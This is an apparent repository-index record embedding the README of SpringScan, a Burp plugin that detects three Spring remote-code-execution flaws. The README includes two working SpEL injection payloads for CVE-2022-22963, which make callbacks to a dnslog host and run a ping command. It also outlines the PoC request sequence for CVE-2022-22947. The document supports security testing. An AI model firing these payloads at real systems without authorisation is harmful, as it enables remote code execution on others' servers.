{"id":13843057,"url":"https://github.com/metaStor/SpringScan","last_synced_at":"2025-07-11T17:33:18.859Z","repository":{"id":37418991,"uuid":"479621264","full_name":"metaStor/SpringScan","owner":"metaStor","description":"SpringScan vulnerability detection Burp plugin","archived":false,"fork":false,"pushed_at":"2023-11-14T01:34:38.000Z","size":4103,"stargazers_count":562,"open_issues_count":1,"forks_count":47,"subscribers_count":8,"default_branch":"main","last_synced_at":"2024-08-05T17:35:48.324Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/metaStor.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2022-04-09T04:51:10.000Z","updated_at":"2024-07-31T15:16:44.000Z","dependencies_parsed_at":"2023-11-11T20:26:20.901Z","dependency_job_id":"dc947abb-0b72-443b-9287-eec2f1573b87","html_url":"https://github.com/metaStor/SpringScan","commit_stats":null,"previous_names":[],"tags_count":10,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/metaStor%2FSpringScan","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/metaStor%2FSpringScan/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/metaStor%2FSpringScan/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/metaStor%2FSpringScan/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/metaStor","download_url":"https://codeload.github.com/metaStor/SpringScan/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225745419,"owners_count":17517639,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:54.146Z","updated_at":"2024-11-21T14:30:40.580Z","avatar_url":"https://github.com/metaStor.png","language":"Java","funding_links":[],"categories":["其他_安全与渗透","Java"],"sub_categories":["网络服务_其他"],"readme":"# SpringScan Burp Detection Plugin\n\n## Supported vulnerabilities\n\n- [x] Spring Core RCE (**CVE-2022-22965**)\n- [x] Spring Cloud Function SpEL RCE (**CVE-2022-22963**)\n- [x] Spring Cloud GateWay SPEL RCE (**CVE-2022-22947**)\n\n## Callback platforms\n\n- [x] Dnslog (default)\n- [x] BurpCollaboratorClient\n- [x] Ceye\n- [ ] Digpm\n- [ ] Support for custom callback platforms\n\n### CVE-2022-22965 detection method\n\nExploitation conditions\n\n* JDK 9 or later;\n* The Spring-beans package is used;\n* Spring parameter binding is used, and the bound parameter is a non-primitive type such as a POJO;\n* Deployed on Tomcat with access logging enabled (enabled by default)\n\nBecause uploading a shell through this bug also requires the exact web path (by default webapps\\ROOT), and writing SSH keys or scheduled tasks requires root privileges, detecting the vulnerability with a full exploit is impractical in real engagements, so the approach shifted to other ways of confirming that the vulnerability exists. Detection mainly uses the following two methods:\n\n* Echo detection\n* Callback detection (Digpm/BurpCollaboratorClient/Dnslog/Ceye)\n\nDetailed principle ➡️ [https://www.t00ls.cc/articles-65348.html](https://www.t00ls.cc/articles-65348.html)\n\nDetection confidence:\n\n\u003e callback detection \u003e echo detection\n\nEcho detection has a relatively high false-positive rate: it may indicate a vulnerability without guaranteeing that the JDK version is **9** or later, but it can catch vulnerable hosts that have no outbound network access. Callback detection is highly accurate but cannot be used in environments without outbound network access.\nIt is recommended to enable only echo detection in intranet environments, and both echo and callback detection on the public internet.\n\n### CVE-2022-22963 detection method\n\nExploitation conditions\n\n* The default route `/functionRouter` is subject to SpEL expression injection\n\nTwo detection methods:\n\n* Via Java's built-in InetAddress class: `spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName(\"xxx.dnslog.cn\")` callback probe (detects the vulnerability while avoiding WAF rules that block command execution)\n* Via the `ping` command: `spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"ping xxx.dnslog.cn\")` callback probe\n* Both the current URI and the current URI with the default route `/functionRouter` appended are probed.\n\n### CVE-2022-22947 detection method\n\nExploitation conditions\n\nWhen Spring Cloud Gateway has the Gateway Actuator endpoint enabled and exposed, applications using Spring Cloud Gateway are susceptible to code injection. An attacker can send a specially crafted malicious request to execute arbitrary code remotely.\n\nDetection method:\n\n* Two checks determine whether the target is Spring Cloud Gateway:\n  1. Request a random non-existent path and use the `Whitelabel Error Page` signature to identify the Spring framework (1.x/2.x);\n  2. Request /actuator/gateway/routes and /prod-api/actuator/gateway/routes directly and check for the `route_id` signature.\n* The PoC consists of five requests: `add a route containing the malicious SpEL expression -\u003e refresh routes -\u003e request the added route to view the RCE result -\u003e delete the route -\u003e refresh routes`\n\n## Plugin coverage\n\n|             **Echo detection**             |             **Callback detection**              |\n|:--------------------------------:|:---------------------------------:|\n| Spring Core RCE (CVE-2022-22965) | Spring Core RCE (CVE-2022-22965)  |\n| Spring Cloud GateWay SPEL RCE (CVE-2022-22947) | Spring Cloud Function SpEL RCE (CVE-2022-22963) |\n\n## TODO\n\n- [x] Fix scan results that stayed in the waiting state indefinitely\n- [x] Configuration can be saved locally\n- [ ] Improve the ScannerUI (add a clear button, CVE entries, display of multiple vulnerabilities)\n- [ ] Add other Spring vulnerabilities\n\n## Build\n\nTo build for a different JDK version, the jar can be built as follows:\n\n![image-20220409120135726](imgs/image-20220409120135726.png)\n\n\u003cimg src=\"imgs/image-20220409120218010.png\" alt=\"image-20220409120218010\" style=\"zoom:50%;\" /\u003e\n\n\u003cimg src=\"imgs/image-20220409120315324.png\" alt=\"image-20220409120315324\" style=\"zoom:50%;\" /\u003e\n\n\u003cimg src=\"imgs/image-20220409120455863.png\" alt=\"image-20220409120455863\" style=\"zoom:50%;\" /\u003e\n\n## Screenshots\n\n* Plugin loaded successfully\n\n![image-20220430195312197](imgs/image-20220430195312197.png)\n\n* Vulnerability detection results\n\n![image-20220411234911184](imgs/image-20220411234911184.png)\n\n![image-20220411234930710](imgs/image-20220411234930710.png)\n\n![image-20220411234948718](imgs/image-20220411234948718.png)\n\n* Detection results on an error response\n\n![image-20220425233957353](imgs/image-20220425233957353.png)\n\nVulnerability details can be viewed in the Target tab\n\n![image-20220409124402852](imgs/image-20220409124402852.png)\n\n* Plugin settings: all detection methods are enabled by default, and the default callback platform is `Dnslog`\n\n![image-20220409120720309](imgs/image-20220409120720309.png)\n\n![image-20220413012818703](imgs/image-20220413012818703.png)\n\n* Active scan: if you do not want every URL to be scanned passively, disable the plugin (leaving the detection methods enabled) and run an active scan via `right-click the request -\u003e Extensions -\u003e SpringScan -\u003e doScan`:\n\n![image-20220430194559458](imgs/image-20220430194559458.png)\n\n* Plugin configuration can be saved\n\n![image-20231112032954897](imgs/image-20231112032954897.png)\n\n## Disclaimer\n\nThis tool is provided solely for security research and exchange; do not use it for illegal purposes. If you engage in any illegal activity while using this tool, you bear the consequences yourself, and the author assumes no legal or joint liability.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FmetaStor%2FSpringScan","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FmetaStor%2FSpringScan","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FmetaStor%2FSpringScan/lists"}